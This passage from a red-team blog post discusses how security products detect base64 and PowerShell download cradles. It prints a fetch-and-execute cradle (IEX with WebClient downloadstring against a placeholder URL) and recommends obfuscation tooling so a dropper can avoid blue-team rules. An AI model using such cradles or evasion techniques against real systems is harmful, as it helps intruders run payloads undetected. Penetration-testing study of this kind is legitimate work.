testmactest/testmactest.github.io/_posts/2020-04-16-RedTeam-Exercises-with-OpenSource-Tools-Part-2.md

 Most security related solutions created features for detecting base64 encoded strings and analyzing them after the content is decoded.
 CarbonBlack, FireEye made public their sollutions' capabilities in the past, being clear for us that the above arguments are using as a part of their detection rules: you can read more <a href="https://www.carbonblack.com/2015/08/14/how-to-detect-powershell-empire-with-carbon-black/" style="text-decoration: none;">here</a> and <a href="https://www.fireeye.com/blog/threat-research/2018/07/malicious-powershell-detection-via-machine-learning.html" style="text-decoration: none;">here</a>.

 <br/>Now that I identified almost all the patterns that are triggering the Microsoft's signatures, let's speak about the dropper before starting with the demo.

+<b> Dropper </b><br/>
+Maybe many of you are just using the powershell command "IEX((New-Object System.Net.WebClient).downloadstring('http://something'));" for downloading in memory your payload.
+I worked in a SOC and I know the strings "new-object","Webclient","downloadstring" are used by many for detecting malicious events so I do not want be catched by any blue team.
+This being said, I do not want to be catched by some basic rules for detecting suspicious powershell so I will make use of a open source tool made special for this kind of tasks.<br/>
+Like as Invoke-Obfuscation, Daniel Bohannon created a <a href="https://github.com/danielbohannon/Invoke-CradleCrafter" style="text-decoration: none;">tool</a> like as Invoke-Obfuscation, for obfuscated in memory or on disk downloader.

+I invite you to take a look on it in case you are interested in using the downloader on disk.
+I am using the only in memory downloader.

 <b> Demo </b><br/>